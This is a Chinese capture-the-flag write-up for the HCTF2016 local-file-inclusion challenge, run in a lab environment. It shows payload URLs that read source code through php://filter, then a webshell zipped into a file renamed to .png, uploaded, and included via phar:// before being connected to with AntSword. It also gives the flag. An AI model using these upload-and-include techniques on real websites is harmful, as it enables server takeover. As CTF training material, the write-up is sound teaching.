当前位置: 首页 > news >正文

兵者多诡(HCTF2016)

news 2025/7/15 5:18:19

环境:https://github.com/MartinxMax/CTFer_Zero_one

题目简介

解题过程

登录首页

图片.png

提交png图片上传抓包,可以看到是向upload文件提交数据

图片.png

图片.png

在fp参数中尝试伪协议读取home.php文件

http://127.0.0.1:88/HCTF2016-LFI/home.php?fp=php://filter/read=convert.base64-encode/resource=home&imagekey=20de480b0e91ea1d67712e491fc2a72b66d782de

包含点后自动被添加了.php,而上传只能是png,那么就利用phar或zip伪协议进行getshell

图片.png

将webshell直接添加压缩包,并且将shell.zip改为shell.png

图片.png

上传图片马,利用phar协议进行文件包含

http://127.0.0.1:88/HCTF2016-LFI/home.php?fp=phar://uploads/25b58d5902e9bb5b9a8569648a86d4dbe9d6d592.png/shell&imagekey=25b58d5902e9bb5b9a8569648a86d4dbe9d6d592

图片.png

上蚁剑,连接webshell

图片.png

Flag

hctf{Th1s_1s_e4sY_1s_n0T_1t?}

http://www.lryc.cn/news/163726.html

相关文章:

  • 【JAVA-Day04】Java关键字和示例:深入了解常用关键字的用法
  • Android请求网络报错:not permitted by network security policy
  • python报错:ImportError: urllib3 v2.0 only supports OpenSSL 1.1.1
  • 如何使用adb command来设置cpu频率和核数
  • 236. 二叉树的最近公共祖先
  • Git常见问题:git pull 和 git pull --rebase二者区别
  • 关于HarmonyOS元服务的主题演讲与合作签约
  • cache 学习
  • SSM - Springboot - MyBatis-Plus 全栈体系(六)
  • 【Flutter】引入网络图片时,提示:Failed host lookup: ‘[图片host]‘
  • Python基础教程:索引和切片
  • JVM基础面试题
  • 蓝桥杯官网填空题(平方末尾)
  • 深入探究数据结构与算法:构建强大编程基础
  • Android 自定义View之圆形进度条
  • 力扣(LeetCode)算法_C++——字母异位词分组
  • 【LeetCode-中等题】59. 螺旋矩阵 II
  • 错误: 找不到或无法加载主类 Main
  • 【云原生】Kubeadmin安装k8s集群
  • Java:Springboot和React中枚举值(数据字典)的使用
  • git撤回 不小心 commit 进去的文件
  • qt之movetothread理解
  • 深入剖析:垃圾回收你真的了解吗?
  • ue5 物理场的应用
  • 移动零00
  • go初识iris框架(四) -框架设置操作
  • python基础语法(二)
  • 从本地到Gitee:一步步学习文件上传及解决常见报错问题
  • idea2018修改大小写提示(敏感)信息
  • Quartz.Net调度框架简介